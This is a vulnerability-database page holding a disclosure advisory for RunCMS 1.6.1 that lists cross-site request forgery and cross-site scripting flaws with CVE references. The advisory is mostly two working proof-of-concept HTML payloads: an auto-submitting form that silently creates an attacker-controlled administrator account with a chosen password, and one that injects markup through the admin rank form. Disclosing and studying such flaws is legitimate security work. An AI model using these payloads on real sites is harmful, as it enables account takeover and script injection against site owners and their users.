Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties
2009.09.15
Credit:
nbbn
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2008-7221
|
CVE-2008-7222
CWE:
CWE-352
CWE-79
###### RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN ###### [b] 1) Create Webmaster (admin) XSRF Vulnerability[/b] <html><head></head><body onLoad="javascript:document.attack.submit()"> <form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r"> <input type="hidden" name="uname" value="Attacker"> <input type="hidden" name="name" value="Attacker"> <input type="hidden" name="email" value="attack (at) attack (dot) com [email concealed]"> <input type="hidden" name="url" value=""> <input type="hidden" name="user_avatar" value="blank.gif"> <input type="hidden" name="theme" value="helloween"> <input type="hidden" name="timezone_offset" value="0"> <input type="hidden" name="language" value="deutsch"> <input type="hidden" name="user_icq" value=""> <input type="hidden" name="user_aim" value=""> <input type="hidden" name="user_msnm" value=""> <input type="hidden" name="user_from" value=""> <input type="hidden" name="user_occ" value=""> <input type="hidden" name="user_intrest" value=""> <input type="hidden" name="user_birth%5b2%5D" value=""> <input type="hidden" name="user_birth%5B1%5D" value=""> <input type="hidden" name="user_birth%5BO%5D" value=""> <input type="hidden" name="user_sig" value=""> <input type="hidden" name="umode" value="flat"> <input type="hidden" name="uorder" value="1"> <input type="hidden" name="bio" value=""> <input type="hidden" name="rank" value="7"> <input type="hidden" name="pass" value="Password"> <input type="hidden" name="pass2" value="Password"> <input type="hidden" name="fct" value="users"> <input type="hidden" name="op" value="addUser"> <input type="hidden" name="submit" value="%DCbernehmen"> Also with XSRF an attacker can update the profile of all users. He can change the password etc... [b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b] <html><head></head><body onLoad="javascript:document.r.submit()"> <form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r"> <input type="text" class="text" name="rank_title" size="30" maxlength="50" value="<marquee>Cross-Site Scritping :-("/> <input type="hidden" name="fct" value="userrank"> <input type="hidden" name="op" value="RankForumAdd"> </form> </body>
Referencje:
http://xforce.iss.net/xforce/xfdb/40630
http://www.securityfocus.com/bid/27852
http://www.securityfocus.com/archive/1/archive/1/488287/100/200/threaded
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top
Polish
English